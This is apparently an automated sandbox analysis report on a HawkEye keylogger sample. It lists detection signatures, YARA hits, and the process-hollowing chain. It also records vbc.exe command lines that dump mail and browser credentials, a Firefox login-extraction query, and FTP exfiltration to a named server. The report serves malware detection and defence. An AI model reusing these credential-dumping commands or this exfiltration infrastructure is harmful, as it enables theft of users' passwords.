
Windows Analysis Report
tDb0ggawON

Overview

General Information

Sample Name: tDb0ggawON (renamed file extension from none to exe)
Analysis ID: 571678
MD5: 91de6efc69676a4dd4ced5e2111ab489
SHA1: 262f23feee502e24d6d044c05bcb7b3153b3920e
SHA256: 57754827b4e179d20088be1aa0fec9d1f8e3a872e81103b2c7264f80a0a86b36
Tags: 32, exe, HawkEye, trojan

Detection

HawkEye, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected MailPassView
Multi AV Scanner detection for submitted file
Yara detected HawkEye Keylogger
Malicious sample detected (through community Yara rule)
Detected unpacking (overwrites its own PE header)
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected HawkEye Rat
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
.NET source code references suspicious native API functions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contains functionality to log keystrokes (.Net Source)
Tries to steal Mail credentials (via file registry)
Changes the view of files in windows explorer (hidden files and folders)
Machine Learning detection for sample
.NET source code contains potential unpacker
Yara detected WebBrowserPassView password recovery tool
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
May infect USB drives
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Uses FTP
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • tDb0ggawON.exe (PID: 5752 cmdline: "C:\Users\user\Desktop\tDb0ggawON.exe" MD5: 91DE6EFC69676A4DD4CED5E2111AB489)
    • tDb0ggawON.exe (PID: 3536 cmdline: C:\Users\user\Desktop\tDb0ggawON.exe MD5: 91DE6EFC69676A4DD4CED5E2111AB489)
      • vbc.exe (PID: 1632 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 2272 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt" MD5: C63ED21D5706A527419C9FBD730FFB2E)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
0000000F.00000000.337528444.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x7b748:$key: HawkEyeKeylogger
  • 0x7d946:$salt: 099u787978786
  • 0x7bd61:$string1: HawkEye_Keylogger
  • 0x7cbb4:$string1: HawkEye_Keylogger
  • 0x7d8a6:$string1: HawkEye_Keylogger
  • 0x7c14a:$string2: holdermail.txt
  • 0x7c16a:$string2: holdermail.txt
  • 0x7c08c:$string3: wallet.dat
  • 0x7c0a4:$string3: wallet.dat
  • 0x7c0ba:$string3: wallet.dat
  • 0x7d488:$string4: Keylog Records
  • 0x7d7a0:$string4: Keylog Records
  • 0x7d99e:$string5: do not script -->
  • 0x7b730:$string6: \pidloc.txt
  • 0x7b796:$string7: BSPLIT
  • 0x7b7a6:$string7: BSPLIT
0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
(54 entries in total; only the first five are shown)

Source | Rule | Description | Author | Strings
11.2.tDb0ggawON.exe.81e0000.10.raw.unpack | HKTL_NET_GUID_Stealer | Detects c# red/black-team tools via typelibguid | Arnim Rupp
  • 0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
11.2.tDb0ggawON.exe.45fa72.1.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
15.0.vbc.exe.400000.4.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
15.0.vbc.exe.400000.2.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
15.0.vbc.exe.400000.3.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
(181 entries in total; only the first five are shown)


Source: Process started | Author: frack113 | Data: Command: C:\Users\user\Desktop\tDb0ggawON.exe, CommandLine: C:\Users\user\Desktop\tDb0ggawON.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\tDb0ggawON.exe, NewProcessName: C:\Users\user\Desktop\tDb0ggawON.exe, OriginalFileName: C:\Users\user\Desktop\tDb0ggawON.exe, ParentCommandLine: "C:\Users\user\Desktop\tDb0ggawON.exe" , ParentImage: C:\Users\user\Desktop\tDb0ggawON.exe, ParentProcessId: 5752, ProcessCommandLine: C:\Users\user\Desktop\tDb0ggawON.exe, ProcessId: 3536


                  AV Detection

Source: tDb0ggawON.exe | Virustotal: Detection: 33%
Source: tDb0ggawON.exe | Metadefender: Detection: 14%
Source: tDb0ggawON.exe | ReversingLabs: Detection: 39%
Source: tDb0ggawON.exe | Avira: detected
Source: tDb0ggawON.exe | Joe Sandbox ML: detected
Source: 15.0.vbc.exe.400000.4.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 11.0.tDb0ggawON.exe.400000.21.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 11.0.tDb0ggawON.exe.400000.21.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 15.0.vbc.exe.400000.2.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 15.0.vbc.exe.400000.3.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 11.0.tDb0ggawON.exe.400000.11.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 11.0.tDb0ggawON.exe.400000.11.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 15.0.vbc.exe.400000.1.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 11.0.tDb0ggawON.exe.400000.4.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 11.0.tDb0ggawON.exe.400000.4.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 11.2.tDb0ggawON.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 11.2.tDb0ggawON.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 11.0.tDb0ggawON.exe.400000.16.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 11.0.tDb0ggawON.exe.400000.16.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 15.0.vbc.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 11.0.tDb0ggawON.exe.400000.6.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 11.0.tDb0ggawON.exe.400000.6.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 0.2.tDb0ggawON.exe.fb0000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2

                  Compliance

Source: C:\Users\user\Desktop\tDb0ggawON.exe | Unpacked PE file: 0.2.tDb0ggawON.exe.fb0000.0.unpack
Source: tDb0ggawON.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: tDb0ggawON.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb | source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.520798219.00000000081E0000.00000004.08000000.00040000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb | source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000F.00000000.337528444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000F.00000000.337259386.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb | source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
Source: tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen | 14_2_00408441
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 14_2_00407E0E FindFirstFileW,FindNextFileW,FindClose | 14_2_00407E0E
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 15_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen | 15_2_00406EC3
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 11_2_078CFE8A
Source: C:\Users\user\Desktop\tDb0ggawON.exe | Code function: 4x nop then lea esp, dword ptr [ebp-08h] | 11_2_08260013

                  Networking

Source: Traffic | Snort IDS: 2020410 ET TROJAN HawkEye Keylogger FTP 192.168.2.5:49770 -> 66.70.204.222:21
Source: Joe Sandbox View | ASN Name: OVHFR OVHFR
Source: Joe Sandbox View | IP Address: 66.70.204.222 66.70.204.222
Source: global traffic | TCP traffic: 192.168.2.5:49771 -> 66.70.204.222:57948
Source: unknown | FTP traffic detected: 66.70.204.222:21 -> 192.168.2.5:49770 (server banner, reassembled from the incremental captures):
  220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  220-You are user number 3 of 50 allowed.
  220-Local time is now 12:44. Server port: 21.
  220-This is a private system - No anonymous login
  220-IPv6 connections are also welcome on this server.
  220 You will be disconnected after 15 minutes of inactivity.
                  Source: vbc.exe, 0000000E.00000003.349517440.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000E.00000002.349986576.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000E.00000003.349382801.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: &ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=truehttp://cookies.onetrust.mgr.consensu.org/https://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=ac2466cf-394d-4fb0-8dd5-5f431e502c8a&partnerId=retailstore2https://login.live.com/me.srfhttps://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=607a8c6f-153c-4a43-061d-c574b2427206&partnerId=retailstore2https://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/store/buy/cartcounthttps://www.google.com/accounts/serviceloginhttp://www.fa
cebook.com/https://login.yahoo.com/config/logintps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehp equals www.facebook.com (Facebook)
                  Source: vbc.exe, 0000000E.00000003.349517440.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000E.00000002.349986576.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 0000000E.00000003.349382801.0000000000C3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: &ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wreply=https:%2F%2fwww.bing.com%2Fsecure%2FPassport.aspx%3Fpopup%3D1%26ssl%3D1&lc=2055&id=264960&checkda=1https://login.live.com/login.srfhttps://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fabout:blankhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=truehttp://cookies.onetrust.mgr.consensu.org/https://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=ac2466cf-394d-4fb0-8dd5-5f431e502c8a&partnerId=retailstore2https://login.live.com/me.srfhttps://login.live.com/me.srf?wa=wsignin1.0&wreply=https%3A%2F%2Fwww.microsoft.com&uaid=607a8c6f-153c-4a43-061d-c574b2427206&partnerId=retailstore2https://www.microsoft.com/en-us/welcomeie11/welcomeie11https://www.microsoft.com/store/buy/cartcounthttps://www.google.com/accounts/serviceloginhttp://www.fa
cebook.com/https://login.yahoo.com/config/logintps://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehp equals www.yahoo.com (Yahoo)
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.335816568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 0000000E.00000000.336658254.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: vbc.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl.globalsign.com/root.crl0V
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: tDb0ggawON.exe, 00000000.00000003.260814999.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260930392.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.261060688.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.261366265.0000000008868000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260697523.0000000008867000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://en.w
Source: tDb0ggawON.exe, 00000000.00000003.260814999.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260583898.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260469872.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260930392.0000000008867000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.260697523.0000000008867000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://en.wikip
Source: tDb0ggawON.exe, 00000000.00000003.260004704.0000000008866000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://en.wz
Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: tDb0ggawON.exe, 0000000B.00000002.518137618.000000000323E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ftp.manchutimefashion.com
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijc4NDFiMmZlNWMxZGU2M2JkNDdjMGQzZWI3NjIzYjlkNWU5N
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTly?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuY5J?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
Source: bhvED7C.tmp.14.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
